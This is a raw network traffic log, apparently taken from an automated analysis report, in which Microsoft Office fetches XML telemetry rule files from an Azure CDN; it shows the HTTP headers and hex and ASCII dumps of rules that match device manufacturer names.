                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              52192.168.2.44980613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:31 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:31 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 471
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                              ETag: "0x8DC582BB5815C4C"
                                                                              x-ms-request-id: 0446fb47-b01e-0002-3b49-271b8f000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064931Z-16849878b786jv8w2kpaf5zkqs00000000d0000000004t52
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              53192.168.2.44980713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:31 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:31 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 494
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                              ETag: "0x8DC582BB8972972"
                                                                              x-ms-request-id: fbaa75ab-301e-0020-3742-266299000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064931Z-r197bdfb6b4b4pw6nr8czsrctg00000002a00000000045nv
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:31 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              54192.168.2.44980813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:31 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:31 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                              x-ms-request-id: 80263b1c-901e-002a-38ad-247a27000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064931Z-15b8d89586fxdh48qknu9dqk2g00000005s00000000001rm
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              55192.168.2.44980913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:32 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:32 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 420
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                              x-ms-request-id: 06960f57-101e-000b-0c20-265e5c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064932Z-17c5cb586f6mkpfk79wxvcahc0000000020g000000009z6k
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:32 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              56192.168.2.44981013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:32 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:32 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 472
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                              ETag: "0x8DC582B9D43097E"
                                                                              x-ms-request-id: 96a66594-b01e-0070-61ef-261cc0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064932Z-16849878b78x6gn56mgecg60qc00000003g00000000065hb
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              57192.168.2.44981113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:32 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:32 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 427
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                              ETag: "0x8DC582BA909FA21"
                                                                              x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064932Z-16849878b78wc6ln1zsrz6q9w8000000018g00000000e6nx
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              58192.168.2.44981313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:32 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:32 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 423
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                              ETag: "0x8DC582BB7564CE8"
                                                                              x-ms-request-id: efc778c0-f01e-0052-4de5-219224000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064932Z-16849878b78q4pnrt955f8nkx80000000a90000000004sgx
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:32 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              59192.168.2.44981213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:32 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:32 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 486
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                              ETag: "0x8DC582B92FCB436"
                                                                              x-ms-request-id: af8b8727-001e-00a2-18f5-24d4d5000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064932Z-15b8d89586fst84k5f3z220tec0000000he0000000000ksq
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:32 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              60192.168.2.44981513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 404
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                              ETag: "0x8DC582B95C61A3C"
                                                                              x-ms-request-id: 2897d81f-501e-005b-6528-26d7f7000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-17c5cb586f67p8ffw0hbk5rahw00000003v000000000a0fh
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              61192.168.2.44981413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:32 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 478
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                              ETag: "0x8DC582B9B233827"
                                                                              x-ms-request-id: 25f4145c-101e-005a-559b-24882b000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-15b8d89586fcvr6p5956n5d0rc00000007fg000000007geg
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              62192.168.2.44981613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:33 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 468
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                              ETag: "0x8DC582BB046B576"
                                                                              x-ms-request-id: 7ae13fc9-101e-005a-3933-26882b000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-17c5cb586f6f8m6jnehy0z65x400000000ug00000000cbfv
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
